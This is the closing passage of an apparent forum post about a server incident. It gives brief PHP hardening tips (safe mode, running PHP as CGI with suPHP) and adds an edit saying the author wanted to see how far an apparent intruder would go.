- Without safe mode nothing works, despite suphp!
- Always run php as CGI!
I hope this post helps some people avoid damage! Nice story, eh?
EDIT: I wasn't seriously expecting tips; it only partly looks that way in the log. I wanted to know how far the guy would really go!
HTH
ffl

